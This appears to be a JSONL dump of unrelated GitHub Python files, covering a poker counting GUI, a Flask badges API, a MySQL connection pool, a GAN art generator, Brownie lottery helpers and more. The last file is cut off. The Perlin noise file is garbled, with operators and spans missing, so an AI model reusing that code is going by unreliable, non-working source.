+{"seq_id":"25207267707","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom process import main\n\nclass Generator_card_Shuffle(ttk.Frame):\n # default\n name_file_to_count = 'A'\n\n def __init__(self, master=None):\n super().__init__(master)\n self.pack()\n self.create_widgets()\n\n def create_widgets(self):\n file_to_count = tk.StringVar()\n\n self.label_file_to_count = ttk.Label(self, text='Counting Flop Pattern')\n self.label_file_to_count.grid(row=0, column=0, columnspan=4, sticky='N',pady=15)\n self.label_name_file_to_count = ttk.Label(self, text=\"Name file to count:\")\n self.label_name_file_to_count.grid(row=1, column=0, sticky=tk.W)\n self.entry_number_of_rows = ttk.Entry(self, width=10, textvariable=file_to_count)\n self.entry_number_of_rows.grid(row=1, column=1, sticky=tk.W, padx=5)\n\n self.button_counting = ttk.Button(self, text=\"Counting\", command=self.counting)\n self.button_counting.grid(row=4, column=0, columnspan=4, pady=20, sticky=\"N\")\n\n self.name_file_to_count = file_to_count.get()\n\n option_list = ('Count_All','Turn(1)', 'River(1)', 'Small blind(2)', 'Big blind(2)', 'Under the gun(UTG)(2)','Under the gun(UTG)+1(2)', 'Middle position (MP)(2)', 'Middle position (MP)+1(2)', 'Cut off(2)','Button(2)')\n self.option_menu = ttk\n value = tk.StringVar(self)\n value.set('เลือก Option')\n self.option_menu = tk.OptionMenu(self, value, *option_list)\n self.option_menu.config(width=10)\n self.option_menu.grid(row=2, column=0, columnspan=2, pady=5, sticky=\"N\")\n self.value = value\n\n def get_option(self):\n return self.value.get()\n\n\n def counting(self):\n self.name_file_to_count = self.entry_number_of_rows.get()\n if self.get_option() == 'Count_All':\n main(self.name_file_to_count,['Turn(1)', 'River(1)', 'Small blind(2)', 'Big blind(2)', 'Under the gun(UTG)(2)','Under the gun(UTG)+1(2)', 'Middle position (MP)(2)', 'Middle position (MP)+1(2)', 'Cut off(2)','Button(2)'])\n else:\n main(self.name_file_to_count,[self.get_option()])\n self.popup()\n\n def popup(self):\n self.popup_window = tk.Toplevel()\n self.popup_window.title(\"Done!\")\n self.popup_window.geometry(\"150x50\")\n self.popup_window.resizable(False, False)\n self.popup_window.wm_attributes(\"-topmost\", 1)\n self.button_counting = ttk.Button(self.popup_window, text=\"OK\", command=self.popup_window.destroy)\n self.button_counting.grid(row=3, column=0, columnspan=4, pady=20, sticky=\"N\")\n self.button_counting.pack()\n\n\n\n\nif __name__ == \"__main__\":\n app = tk.Tk()\n app.title(\"Flop Counting\")\n app.geometry(\"250x170\")\n app = Generator_card_Shuffle(master=app)\n app.mainloop()\n","repo_name":"JamesAsuraA93/Excel_main","sub_path":"counting/app_counting.py","file_name":"app_counting.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"11284933362","text":"from fastapi import FastAPI, File, HTTPException\n\n# Please see https://dhali.io/docs/#/ for more info\n\n# \n\napp = FastAPI()\n\n# \n\n@app.put(\"/run/\")\nasync def infer(input: bytes = File()):\n\n try:\n # You must extract the input to the model from `input`.\n #\n # If `input` is a text string:\n # text=input.decode(\"utf-8\")\n #\n # If `input` is a json object:\n # import json\n # json_input = json.loads(input.decode(\"utf-8\"))\n #\n # If `input` is an image:\n # from PIL import Image\n # image = Image.open(io.BytesIO(input))\n #\n # If `input` is an image base64 embedded into a json:\n # import json\n # import base64\n # json_input = json.loads(input.decode(\"utf-8\"))\n # img_data = json_input[\"image\"].encode()\n # content = base64.b64decode(img_data)\n #\n # \n # \n # \n #\n # The format of the result can be anything returnable from a FastAPI\n # endpoint. E.g.:\n\n return {\"results\": \"CALCULATED RESULT\"}\n \n except Exception as e:\n raise HTTPException(422, f\"Your input could not be parsed: {e}\")\n","repo_name":"Dhali-org/Dhali-asset-template","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"41307310409","text":"import argparse\nfrom songs import get_songs, extract_details\nfrom matches import matches \nfrom playlist import extract_id_from_uri\nimport json\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Use a query string to search a list of spotify playlists')\n\n parser.add_argument('--playlist', \"-p\", help=\"spotify playlist URI\", required=True, action=\"append\")\n parser.add_argument('--query', \"-q\", help=\"query string\", required=True)\n parser.add_argument('--verbose', \"-v\", help=\"verbose output\", action=\"store_false\", default=False)\n return parser.parse_args()\n\ndef build_url(uri):\n return \"https://open.spotify.com/playlist/\" + extract_id_from_uri(uri)\n\ndef run():\n args = get_args()\n urls = [build_url(uri) for uri in args.playlist]\n songs = [song for url in urls for song in get_songs(url)]\n\n matched_songs = matches(args.query, songs)\n if args.verbose:\n print(json.dumps(matched_songs))\n else:\n print(json.dumps([extract_details(song) for song in matched_songs]))\n\nif __name__ == \"__main__\":\n run()","repo_name":"dandandy/spotplaylist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20889295813","text":"#!/usr/bin/env python3\n\nimport os, sys, json\nimport pandas as pd\nimport numpy as np\nfrom pyvis.network import Network\n\n\ndef run_PageRank(filein):\n \"\"\"Run PageRank.py and create a file to save results.\n\n Args:\n filein (str): File path of a file fotmated as follow :\n fromNode\\ttoNode\\n\n fromNode\\ttoNode\\n\n etc\n \"\"\" \n os.system(f\"python PageRank.py {filein} > {os.path.join('output','results.txt')}\")\n\ndef convert_results_txt2json():\n \"\"\"Convert results.txt (created by run_PageRank function) to json format.\n \"\"\" \n with open(os.path.join('output','results.txt'), \"r\") as filein:\n with open(os.path.join('output','results.json'), \"w\") as fileout:\n fileout.write(\"[\")\n for line in filein:\n fileout.write(\"{\" + line.strip().replace(\"\\t\", \":\") + \"},\\n\")\n fileout.write('{\"-1\" : {\"rank\":0.0,\"AdjacencyList\":[]}}\\n]')\n\ndef get_rank_df():\n \"\"\"Create Dataframe : rank = pd.DataFrame({\"id\":id, \"pagerank\":pagerank, \"redirect_list\":redirect_list})\n \"\"\"\n id = []\n pagerank = []\n redirect_list = []\n with open(os.path.join('output','results.json'), \"r\") as f:\n results = json.load(f)\n for elm in results:\n id.append(int(list(elm.keys())[0]))\n pagerank.append(list(elm.values())[0][\"rank\"])\n redirect_list.append(list(elm.values())[0][\"AdjacencyList\"])\n return pd.DataFrame({\"id\":id, \"pagerank\":pagerank, \"redirect_list\":redirect_list})\n \ndef get_net_df():\n \"\"\"Create Dataframe : net = pd.DataFrame({\"source\":source, \"target\":target})\n \"\"\"\n source = []\n target = []\n with open(filein, \"r\") as f:\n for line in f:\n line = line.strip().split('\\t')\n source.append(int(line[0]))\n target.append(int(line[1]))\n return pd.DataFrame({\"source\":source, \"target\":target})\n\ndef get_topn_df(rank, net, n):\n \"\"\"Get Top n sort by pagerank from net DataFrame\n \"\"\"\n topn = rank[[\"id\", \"pagerank\"]].sort_values(by=\"pagerank\", ascending=False)[:n]\n print(f\"\\nTop {n} nodes :\\n\", topn)\n return net[net.source.isin(topn.id)].astype(str)\n \ndef visualization(net_topn) :\n network = Network(height='1000px', width='100%', bgcolor='#222222', font_color='white')\n network.barnes_hut()\n \n sources = net_topn.source\n targets = net_topn.target\n weights = np.ones(len(net_topn))\n for src, dst, w in zip(sources, targets, weights):\n network.add_node(src, src, title=src)\n network.add_node(dst, dst, title=dst)\n network.add_edge(src, dst, value=w)\n\n neighbor_map = network.get_adj_list()\n\n # add neighbor data to node hover data\n for node in network.nodes:\n node['value'] = len(neighbor_map[node['id']]) * 100\n\n network.show_buttons(filter_=['physics'])\n network.show(os.path.join('output','network.html'))\n \n \nif __name__==\"__main__\":\n \n if len(sys.argv)<2:\n raise Exception(\"Missing arguments\")\n filein = sys.argv[1]\n \n os.makedirs('output', exist_ok = True)\n if not os.path.isfile(os.path.join('output','results.txt')):\n print('run')\n run_PageRank(filein)\n if not os.path.isfile(os.path.join('output','results.json')):\n convert_results_txt2json()\n \n # Get top n\n rank = get_rank_df()\n net = get_net_df()\n net_topn = get_topn_df(rank, net, 5)\n\n # Visualization\n visualization(net_topn)\n","repo_name":"amait41/pagerank","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"11567243425","text":"#!/usr/bin/python3\ndef weight_average(my_list=[]):\n if not my_list:\n return 0\n\n weight = 0\n score = 0\n for pair in my_list:\n a, b = pair\n score += a * b\n weight += b\n return score / weight\n","repo_name":"Ella711/holbertonschool-higher_level_programming","sub_path":"0x04-python-more_data_structures/100-weight_average.py","file_name":"100-weight_average.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33339250689","text":"from flask import Blueprint, render_template, abort, Flask, request, send_from_directory\nfrom flask.ext.sqlalchemy import SQLAlchemy\nimport json\nfrom flask.ext.jsonpify import jsonify\n\nbadge = Flask(__name__)\nbadge.config.from_object('badges.config')\ndb = SQLAlchemy(badge)\nfrom badges import models\nfrom badges.models import *\nbadges = Blueprint('badges', 'badges')\n\n#========= The above part will be more or less the same for all GDE =======#\n\n#========================= Non-route functions ============================#\n\ndef add_user(username):\n me = User(username)\n db.session.add(me)\n db.session.commit()\n return\n\ndef find_user_force(username):\n user = User.query.filter_by(nickname=username).first()\n if user is None:\n add_user(username)\n user = User.query.filter_by(nickname=username).first()\n return user\n\ndef find_badge(name):\n badge = Badge.query.filter_by(name=name).first()\n return badge\n\ndef delete_all_users(username):\n users = User.query.all()\n for user in users:\n db.session.delete(user)\n db.session.commit()\n\n#========================= Routes are defined below =======================#\n\n@badges.route('/', defaults={'page': 'index'})\ndef module_name(page):\n return 'Badges module'\n\n@badges.route('/users', methods=[\"GET\"])\ndef show_all_users():\n users = User.query.all()\n data = []\n for user in users:\n data.append({\n 'id': user.id,\n 'name': user.nickname\n })\n return jsonify({\n 'success': True,\n 'message': '',\n 'data': data\n })\n\n@badges.route('/user/', methods=[\"GET\"])\ndef show_user(page):\n user = User.query.filter_by(nickname=page).first()\n badge_ids = UserBadge.query.filter_by(user_id=user.id)\n badges = []\n for b in badge_ids:\n badge = Badge.query.filter_by(id=b.badge_id).first()\n badges.append(badge.to_dict())\n data = ({\n 'id': user.id,\n 'name': user.nickname,\n 'badges': badges\n })\n return jsonify({\n 'success': True,\n 'message': 'User exist',\n 'data': data\n })\n\n@badges.route('/create', methods=[\"POST\"])\ndef create_badge():\n try:\n badge = Badge(request.form['name'], request.form['description'], request.form['image_name'])\n db.session.add(badge)\n db.session.commit()\n except:\n return jsonify({\n 'success': False,\n 'message': 'Something went wrong :('\n })\n return jsonify({\n 'success': True,\n 'message': 'Badge added successfully'\n })\n\n@badges.route('/list', methods=[\"GET\"])\ndef show_all_badges():\n badges = Badge.query.all()\n data = []\n for badge in badges:\n data.append(badge.to_dict())\n return jsonify({\n 'success': True,\n 'message': '',\n 'data': data\n })\n\n\n@badges.route('/award', methods=[\"POST\"])\ndef create_badge_user_mapping():\n try:\n user = find_user_force(request.form['username'])\n badge = find_badge(request.form['badge'])\n existing = UserBadge.query.filter_by(user_id=user.id, badge_id=badge.id).all()\n if len(existing) > 0:\n return jsonify({\n 'success': False,\n 'message': 'User already has this badge'\n })\n mapping = UserBadge(user, badge)\n db.session.add(mapping)\n db.session.commit()\n except:\n return jsonify({\n 'success': False,\n 'message': 'Something went wrong :('\n })\n return jsonify({\n 'success': True,\n 'message': 'Badge awarded successfully'\n })\n\n@badges.route('/static/', methods=[\"GET\"])\ndef send_static(page):\n return send_from_directory('badges/static', 
page)","repo_name":"IIITSERC/SE_2016_GDE","sub_path":"srcGDE/badges/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"73102548329","text":"from brownie import(\n accounts,\n network,\n config,\n MockV3Aggregator,\n VRFCoordinatorMock,\n LinkToken,\n Contract,\n interface\n)\n\nDECIMALS = 18\nINITIALANSWER = 200000000000\n\nFORKED_ENVS = [\"mainnet-fork\", \"mainnet-fork-dev\"]\nLOCAL_DEVELOPMENT_ENVS = [\"development\", \"Ganache-local\"]\n\ncontract_to_mock = {\n \"eth_usd_price_feed\": MockV3Aggregator,\n \"vrf_coordinator\": VRFCoordinatorMock,\n \"link_token\": LinkToken,\n}\n\ndef get_account(index=None, id=None):\n if index:\n return accounts[index]\n if id:\n return accounts.load(id)\n if (\n network.show_active() in LOCAL_DEVELOPMENT_ENVS\n or network.show_active() in FORKED_ENVS\n ):\n return accounts[0]\n # if nothing above 3 statmens is true the below one will be done\n return accounts.add(config[\"Wallets\"][\"from_key\"])\n\ndef get_contract(contract_name):\n contract_type = contract_to_mock[contract_name]\n if network.show_active() in LOCAL_DEVELOPMENT_ENVS:\n if len(contract_type) <= 0:\n deploy_mock()\n contract = contract_type[-1]\n else:\n contract_address = config[\"networks\"][network.show_active()][contract_name]\n contract = Contract.from_abi(\n contract_type._name, contract_address, contract_type.abi\n )\n return contract\n\ndef deploy_mock():\n \n adbhut_print(f\"active network is {network.show_active()}\",\"=\")\n adbhut_print(\"Deploying MOCKS.....!!\",\"?\")\n MockV3Aggregator.deploy(\n DECIMALS, # Parameter that constructor takes this is _decimals\n INITIALANSWER, # Parameter that constructor takes _initialAnswer\n {\"from\": get_account()}, # since it is state change type\n )\n link_token = LinkToken.deploy({\"from\": get_account()})#deploying contract of link token\n VRFCoordinatorMock.deploy(link_token.address,{\"from\":get_account()})\n #deploying contract of VRFCoordinatorMock, tales link token address as input to contract \n adbhut_print(\"|||||||mock deployed|||||||\",\"=\")\n\ndef fund_with_link(\n contract_address, account=None, link_token=None, amount=100000000000000000\n): # 0.1 LINK\n account = account if account else get_account()\n link_token = link_token if link_token else get_contract(\"link_token\")\n tx = link_token.transfer(contract_address, amount, {\"from\": account})\n #OR\n # link_token_contract = interface.LinkTokenInterface(link_token.address)\n # tx = link_token_contract.transfer(contract_address, amount, {\"from\": account})\n #before doing this make sure to copy pasete the link token interface file into your interfaces folder\n tx.wait(1)\n adbhut_print(\"Contract Funded!\")\n return tx\n\ndef adbhut_print(input_str,second_char=\"=\"):\n char_pairs=int((len(input_str))/2)\n if (len(input_str))%2==0:\n char_len=(\"=\"+second_char)*char_pairs\n print(f\"{char_len}\\n{input_str}\\n{char_len}\")\n else:\n char_len=(\"=\"+second_char)*char_pairs\n print(f\"{char_len}=\\n{input_str}\\n{char_len}=\")\n\n","repo_name":"KingSlayer-KS/SmartContract-LOTTERY","sub_path":"scripts/helpful_scripts.py","file_name":"helpful_scripts.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"43408240805","text":"import logging\nimport threading\nimport contextlib\n\nfrom pymysql.connections import Connection\nfrom pymysql.cursors import DictCursor, Cursor\n\nfrom .pool import PoolContainer, PoolIsFullException, PoolIsEmptyException\n\nlogger = logging.getLogger('pymysqlpool')\n\n__all__ = ['MySQLConnectionPool']\n\n\nclass NoFreeConnectionFoundError(Exception):\n pass\n\n\nclass PoolBoundaryExceedsError(Exception):\n pass\n\n\nclass MySQLConnectionPool(object):\n\n def __init__(self, pool_name, host=None, user=None, password=\"\", database=None, port=3306,\n charset='utf8', use_dict_cursor=True, max_pool_size=30,\n enable_auto_resize=True, auto_resize_scale=1.5,\n pool_resize_boundary=48,\n defer_connect_pool=False, **kwargs):\n\n \"\"\"\n 初始化连接池.\n :param pool_name: 连接池的队列名.\n :param host: 数据库host\n :param user: 数据库用户名\n :param password: 数据库密码\n :param database: 数据库名\n :param port: 数据库端口\n :param charset: 数据库编码\n :param use_dict_cursor: 是否使用dict游标\n :param max_pool_size: 最大连接数\n :param enable_auto_resize: 是否允许动态更改最大连接数\n :param pool_resize_boundary: 设置数据库允许的最大连接\n :param auto_resize_scale: 连接池动态更改最大比例\n :param kwargs: 其他`pymysql.Connection`配置项\n \"\"\"\n # 数据库连接配置\n self._host = host\n self._user = user\n self._password = password\n self._database = database\n self._port = port\n self._charset = charset\n self._cursor_class = DictCursor if use_dict_cursor else Cursor\n self._other_kwargs = kwargs\n\n # 数据库连接池配置\n self._pool_name = pool_name\n self._max_pool_size = max_pool_size if max_pool_size < pool_resize_boundary else pool_resize_boundary\n self._enable_auto_resize = enable_auto_resize\n self._pool_resize_boundary = pool_resize_boundary\n if auto_resize_scale < 1:\n raise ValueError(\n \"Invalid scale {}, must be bigger than 1\".format(auto_resize_scale))\n\n self._auto_resize_scale = int(round(auto_resize_scale, 0))\n self._pool_container = PoolContainer(self._max_pool_size)\n\n self.__safe_lock = threading.RLock()\n self.__is_killed = False\n self.__is_connected = False\n\n if not defer_connect_pool:\n self.connect()\n\n def __repr__(self):\n return ''.format(self.pool_name, self.size)\n\n def __del__(self):\n self.close()\n\n def __iter__(self):\n return iter(self._pool_container)\n\n @property\n def pool_name(self):\n return self._pool_name\n\n @property\n def pool_size(self):\n return self._pool_container.pool_size\n\n @property\n def free_size(self):\n return self._pool_container.free_size\n\n @property\n def size(self):\n return ''.format(self._pool_resize_boundary,\n self._max_pool_size,\n self.pool_size,\n self.free_size)\n\n @contextlib.contextmanager\n def cursor(self, cursor=None):\n with self.connection(True) as conn:\n assert isinstance(conn, Connection)\n cursor = conn.cursor(cursor)\n\n try:\n yield cursor\n except Exception as err:\n conn.rollback()\n raise err\n finally:\n cursor.close()\n\n @contextlib.contextmanager\n def connection(self, autocommit=False):\n conn = self.borrow_connection()\n assert isinstance(conn, Connection)\n old_value = conn.get_autocommit()\n conn.autocommit(autocommit)\n try:\n yield conn\n except Exception as err:\n # logger.error(err, exc_info=True)\n raise err\n finally:\n conn.autocommit(old_value)\n self.return_connection(conn)\n\n def connect(self):\n \"\"\"\n 启动连接池\n \"\"\"\n if self.__is_connected:\n return\n\n logger.info('[{}] Connect to connection pool'.format(self))\n\n test_conn = self._create_connection()\n try:\n test_conn.ping()\n except Exception as err:\n raise err\n else:\n with self.__safe_lock:\n 
self.__is_connected = True\n\n self._adjust_connection_pool()\n finally:\n test_conn.close()\n\n def close(self):\n \"\"\"\n 关闭连接池\n \"\"\"\n try:\n logger.info('[{}] Close connection pool'.format(self))\n except Exception:\n pass\n\n with self.__safe_lock:\n if self.__is_killed is True:\n return True\n\n self._free()\n\n with self.__safe_lock:\n self.__is_killed = True\n\n def borrow_connection(self):\n \"\"\"\n 从连接池中获取一个连接\n \"\"\"\n block = True\n\n while True:\n conn = self._borrow(block)\n if conn is None:\n block = not self._adjust_connection_pool()\n else:\n return conn\n\n def _borrow(self, block):\n try:\n connection = self._pool_container.get(block, None)\n except PoolIsEmptyException:\n return None\n else:\n # 检查连接是否还存活\n connection.ping(reconnect=True)\n return connection\n\n def return_connection(self, connection):\n \"\"\"\n 将使用完连接放回��接池\n \"\"\"\n return self._pool_container.return_(connection)\n\n def _adjust_connection_pool(self):\n \"\"\"\n 动态调整连接池大小.\n \"\"\"\n # 创建几个新连接\n logger.debug('[{}] Adjust connection pool, '\n 'current size is \"{}\"'.format(self, self.size))\n\n if self.pool_size >= self._max_pool_size:\n if self._enable_auto_resize:\n self._adjust_max_pool_size()\n\n try:\n connection = self._create_connection()\n except Exception as err:\n logger.error(err)\n return False\n else:\n try:\n self._pool_container.add(connection)\n except PoolIsFullException:\n logger.debug('[{}] Connection pool is full now'.format(self.pool_name))\n return False\n else:\n return True\n\n def _adjust_max_pool_size(self):\n with self.__safe_lock:\n self._max_pool_size *= self._auto_resize_scale\n if self._max_pool_size > self._pool_resize_boundary:\n self._max_pool_size = self._pool_resize_boundary\n logger.debug('[{}] Max pool size adjusted to {}'.format(self, self._max_pool_size))\n self._pool_container.max_pool_size = self._max_pool_size\n\n def _free(self):\n \"\"\"\n 释放所有连接\n \"\"\"\n for connection in self:\n try:\n connection.close()\n except Exception as err:\n _ = err\n\n def _create_connection(self):\n \"\"\"\n 创建pymysql连接\n \"\"\"\n return Connection(host=self._host,\n user=self._user,\n password=self._password,\n database=self._database,\n port=self._port,\n charset=self._charset,\n cursorclass=self._cursor_class,\n **self._other_kwargs)\n","repo_name":"JeniTurtle/python-orm","sub_path":"libs/database/connect_pool/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":7929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"73580911848","text":"\"\"\"Perlin noise\n\"\"\"\n\nimport math\n\nfrom random import Random\n\n\nPERLIN_YWRAPB = 4\nPERLIN_YWRAP = 1<>= 1;\n\n\ndef noise(*args):\n \"\"\"Computes the Perlin noise (1D, 2D, or 3D) value at the specified coords.\n \"\"\"\n global perlin, perlinRandom\n\n x = args[0]\n y = args[1] if len(args) > 1 else 0\n z = args[2] if len(args) > 2 else 0\n\n if perlinRandom is None:\n perlinRandom = Random()\n\n if perlin is None:\n perlin = [perlinRandom.random() for i in xrange(PERLIN_SIZE + 1)]\n\n x = abs(x)\n x = abs(x)\n z = abs(z)\n\n xi, yi, zi = int(x), int(y), int(z)\n xf, yf, zf = x - xi, y - yi, z - zi\n\n r = 0\n ampl = 0.5\n\n for i in range(perlin_octaves):\n of = xi + (yi<= 1.0: xi += 1; xf -= 1;\n if yf >= 1.0: yi += 1; yf -= 1;\n if zf >= 1.0: zi += 1; zf -= 1;\n\n return r;\n\n# [toxi 031112]\n# now adjusts to the size of the cosLUT used via\n# the new variables, defined above\ndef noise_fsc(i):\n # using bagel's cosine table instead\n return 0.5 * (1.0 - perlin_cos_table[int(i*perlin_PI) % perlin_TWOPI])\n\n# # [toxi 040903]\n# # make perlin noise quality user controlled to allow\n# # for different levels of detail. lower values will produce\n# # smoother results as higher octaves are surpressed\n\n# public void noiseDetail(int lod) {\n# if (lod>0) perlin_octaves=lod;\n# }\n\n# public void noiseDetail(int lod, float falloff) {\n# if (lod>0) perlin_octaves=lod;\n# if (falloff>0) perlin_amp_falloff=falloff;\n# }\n\ndef noiseSeed(what):\n global perlinRandom, perlin\n if perlinRandom is None:\n perlinRandom = Random()\n perlinRandom.seed(what)\n perlin = None\n\n","repo_name":"croach/p5.py","sub_path":"lib/p5/perlin.py","file_name":"perlin.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"29128147111","text":"from tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.layers import (Dense, \n BatchNormalization, \n LeakyReLU, \n Reshape, \n Conv2DTranspose,\n Conv2D,\n Dropout,\n Flatten)\nfrom matplotlib import image\n\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport tensorflow_addons as tfa\n\nIMAGE_SIZE = [256, 256]\n\ndef decode_image(image):\n image = tf.image.decode_jpeg(image, channels=3)\n image = (tf.cast(image, tf.float32) / 127.5) - 1\n image = tf.reshape(image, [*IMAGE_SIZE, 3])\n return image\n\ndef read_tfrecord(example):\n tfrecord_format = {\n \"image\": tf.io.FixedLenFeature([], tf.string)\n }\n example = tf.io.parse_single_example(example, tfrecord_format)\n image = decode_image(example['image'])\n return image\n\ndef load_dataset(filenames):\n dataset = tf.data.TFRecordDataset(filenames)\n dataset = dataset.map(read_tfrecord)\n return dataset\n\ndef down_sample(filters, size, apply_instancenorm=True):\n initializer = tf.random_normal_initializer(0., 0.02)\n gamma_init = keras.initializers.RandomNormal(mean=0.0, stddev=0.02)\n\n layer = keras.Sequential()\n layer.add(layers.Conv2D(filters, size, strides=2, padding='same', kernel_initializer=initializer, use_bias=False))\n\n if apply_instancenorm:\n layer.add(tfa.layers.InstanceNormalization(gamma_initializer=gamma_init))\n\n layer.add(layers.LeakyReLU())\n\n return layer\n\ndef up_sample(filters, size, apply_dropout=False):\n initializer = tf.random_normal_initializer(0., 0.02)\n gamma_init = keras.initializers.RandomNormal(mean=0.0, stddev=0.02)\n\n layer = keras.Sequential()\n layer.add(layers.Conv2DTranspose(filters, size, strides=2, padding='same', kernel_initializer=initializer,use_bias=False))\n layer.add(tfa.layers.InstanceNormalization(gamma_initializer=gamma_init))\n\n if apply_dropout:\n layer.add(layers.Dropout(0.5))\n\n layer.add(layers.ReLU())\n\n return layer\n\ndef Generator():\n inputs = layers.Input(shape=[256,256,3])\n down_stack = [\n down_sample(64, 4, apply_instancenorm=False),# (size, 128, 128, 64)\n down_sample(128, 4), # (size, 64, 64, 128)\n down_sample(256, 4), # (size, 32, 32, 256)\n down_sample(512, 4), # (size, 16, 16, 512)\n down_sample(512, 4), # (size, 8, 8, 512)\n down_sample(512, 4), # (size, 4, 4, 512)\n down_sample(512, 4), # (size, 2, 2, 512)\n down_sample(512, 4), # (size, 1, 1, 512)\n ]\n\n up_stack = [\n up_sample(512, 4, apply_dropout=True), # (size, 2, 2, 1024)\n up_sample(512, 4, apply_dropout=True), # (size, 4, 4, 1024)\n up_sample(512, 4, apply_dropout=True), # (size, 8, 8, 1024)\n up_sample(512, 4), # (size, 16, 16, 1024)\n up_sample(256, 4), # (size, 32, 32, 512)\n up_sample(128, 4), # (size, 64, 64, 256)\n up_sample(64, 4), # (size, 128, 128, 128)\n ]\n\n initializer = tf.random_normal_initializer(0., 0.02)\n last = layers.Conv2DTranspose(3, 4, strides=2, padding='same', kernel_initializer=initializer, activation='tanh') \n # (size, 256, 256, 3)\n\n x = inputs\n\n # Downsampling through the model\n skips = []\n for down in down_stack:\n x = down(x)\n skips.append(x)\n\n skips = reversed(skips[:-1])\n\n # Upsampling and establishing the skip connections\n for up, skip in zip(up_stack, skips):\n x = up(x)\n x = layers.Concatenate()([x, skip])\n\n x = last(x)\n\n return keras.Model(inputs=inputs, outputs=x)\n\ndef make_generator_model():\n model = tf.keras.Sequential()\n model.add(Dense(7*7*512, use_bias=False, input_shape=(256,))) #originally 7*7*7, 256*256\n model.add(BatchNormalization())\n 
model.add(LeakyReLU())\n\n model.add(Reshape((7,7,512)))#was 7,7,512\n# assert model.output_shape == (None, 7, 7, 512) # Note: None is the batch size\n model.add(Conv2DTranspose(128, (5, 5), strides=(1, 1), padding='same', use_bias=False)) #originally 128\n# assert model.output_shape == (None, 7, 7, 128)\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n \n model.add(Conv2DTranspose(64, (5, 5), strides=(2, 2), padding='same', use_bias=False)) #originally 64\n# assert model.output_shape == (None, 14, 14, 64)\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n\n model.add(Conv2DTranspose(3, (5, 5), strides=(2, 2), padding='same', use_bias=False, activation='tanh'))#originally 3\n# print(model.output_shape)\n# assert model.output_shape == (None, 28, 28, 3)\n return model\n\n\ndef randomNoiseModel(file):\n gen = make_generator_model()\n gen.load_weights('models/generator4.h5')\n\n noise = tf.random.normal([3, 256])*127.5+100\n plt.imsave('static/input.png', noise.numpy())#.clip(0, 1))\n\n modelOutput = gen(noise)[0]\n plt.imsave(f'static/{file}', modelOutput.numpy().clip(0, 1))\n\n\ndef monetModel(fileIn, fileOut):\n\n print(fileIn)\n monet_generator = Generator()\n monet_generator.load_weights('models/vangogh_generator.h5')\n for img in load_dataset(f'static/{fileIn}').batch(1):\n inputImage = img\n\n inputSaveImage = inputImage[0].numpy().clip(0,1)\n plt.imsave('static/input.png', inputSaveImage)\n\n #inputImage = image.imread(f'static/test3.jpg')\n\n #monet_ds = load_dataset(MONET_FILENAMES).batch(1)\n #modelInput = tf.reshape(tf.convert_to_tensor(image.imread(f'static/test3.jpg')), [1, 256, 256, 3])\n #modelInput = tf.random.normal([1, 256, 256, 3])#*127.5+100\n \n\n #modelOutput = monet_generator(modelInput)[0]\n modelOutput = monet_generator(inputImage, training=False)[0].numpy().clip(0,1)\n plt.imsave(f'static/{fileOut}', modelOutput)","repo_name":"CornellDataScience/GAN-Art-Generation","sub_path":"flask-app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13821988038","text":"from math import sqrt\nimport numpy as np\nfrom KJ import grad_projected\nfrom JS import barrier_method\n\n\nc = 3e5 # km / sec\n# Return path delay between two nodes\n\n\ndef delay(loc_1, loc_2):\n x = loc_1[0] - loc_2[0]\n y = loc_1[1] - loc_2[1]\n return sqrt(x * x + y * y) / c * 10 # multiplied by 10 for scaling\n\n\ndef delay_return(locations_source, locations_server):\n '''\n\tInputs: two layers location coordinates (array)\n\tOutputs: two layers delay matrix (array)\n\t'''\n\n m = len(locations_source)\n n = len(locations_server)\n delay_matrix = np.zeros((m, n))\n for i in range(m):\n for k in range(n):\n delay_matrix[i, k] = delay(locations_source[i], locations_server[k])\n return delay_matrix\n\n\ndef analytic_avg_delay_two_layers(arrival_rates, service_rates, delta, A):\n \"\"\"\n :param arrival_rates: arrival_rates (array, 1 by m size)\n :param service_rates: service_rates (array, 1 by n size)\n :param delta:\n :param A: routing probabilities (array m by n size)\n :return: expected service time including propagation delay considering just two layers\n \"\"\"\n\n m = len(arrival_rates)\n n = len(service_rates)\n lambda_hat = np.matmul(arrival_rates, A)\n res_sum = 0\n for i in range(m):\n res_sum += np.dot(A[i, :], 1 / (service_rates - lambda_hat) + delta[i, :]) * arrival_rates[i]\n return res_sum / sum(arrival_rates)\n\n\ndef analytic_avg_delay(rates, delta, routing_p, vol_dec):\n \"\"\"\n :param rates: [array (rates in layer 0), array (rates in layer 1), ...]\n :param delta:\n :param routing_p: routing probabilities [array (routing probabilites in layer 0), array (routing probabilites in layer 1), ...]\n :param vol_dec:\n :return: expected service time including propagation delay\n 